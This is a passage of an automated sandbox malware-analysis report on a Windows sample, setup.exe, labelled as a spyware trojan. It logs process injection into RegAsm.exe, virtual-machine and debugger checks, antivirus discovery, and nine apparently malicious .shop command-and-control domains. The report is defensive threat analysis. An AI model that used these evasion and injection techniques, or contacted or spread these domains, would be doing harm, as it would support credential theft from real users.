        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00403F201_2_00403F20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00401FE01_2_00401FE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004217E01_2_004217E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040178D1_2_0040178D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409220 appears 45 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00409910 appears 118 times
        Source: C:\Users\user\Desktop\setup.exeCode function: String function: 00AEC2C0 appears 56 times
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 696
        Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@1/1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042D8C5 CoCreateInstance,1_2_0042D8C5
        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3160
        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\794eea8a-eb23-4560-bb3d-938ded2d9c4fJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCommand line argument: Alister0_2_00AE8EC0
        Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: setup.exeReversingLabs: Detection: 81%
        Source: setup.exeVirustotal: Detection: 79%
        Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 696
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\Desktop\setup.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: acgenral.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEBA44 push ecx; ret 0_2_00AEBA57
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\setup.exeAPI coverage: 8.4 %
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2964Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B02953 FindFirstFileExW,0_2_00B02953
        Source: Amcache.hve.5.drBinary or memory string: VMware
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
        Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
        Source: RegAsm.exe, 00000001.00000002.2116197394.000000000162E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
        Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
        Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: RegAsm.exe, 00000001.00000002.2116197394.000000000162E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2116139844.00000000015CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.5.drBinary or memory string: vmci.sys
        Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
        Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.5.drBinary or memory string: VMware20,1
        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
        Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004362B0 LdrInitializeThunk,1_2_004362B0
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEC06D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AEC06D
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B00C65 mov eax, dword ptr fs:[00000030h]0_2_00B00C65
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AF9680 mov ecx, dword ptr fs:[00000030h]0_2_00AF9680
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00B05C53 GetProcessHeap,0_2_00B05C53
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEC06D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AEC06D
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEC1FA SetUnhandledExceptionFilter,0_2_00AEC1FA
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEBD66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AEBD66
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEFE83 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AEFE83

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\setup.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0147018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0147018D
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: richardflorespoew.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: strwawrunnygjwu.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: justifycanddidatewd.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: raiseboltskdlwpow.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: falseaudiencekd.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: pleasurenarrowsdla.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: feighminoritsjda.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: marathonbeedksow.shop
        Source: setup.exe, 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: backcreammykiel.shop
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 111C008Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEBB3C cpuid 0_2_00AEBB3C
        Source: C:\Users\user\Desktop\setup.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00B0508D
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,0_2_00AFC8E0
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B0581C
        Source: C:\Users\user\Desktop\setup.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B059F1
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,0_2_00B05922
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,0_2_00B05288
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,0_2_00B0532F
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,0_2_00B0537A
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B054A0
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,0_2_00B05415
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,0_2_00AFCDA9
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,0_2_00B056F3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00AEBF63 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AEBF63
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
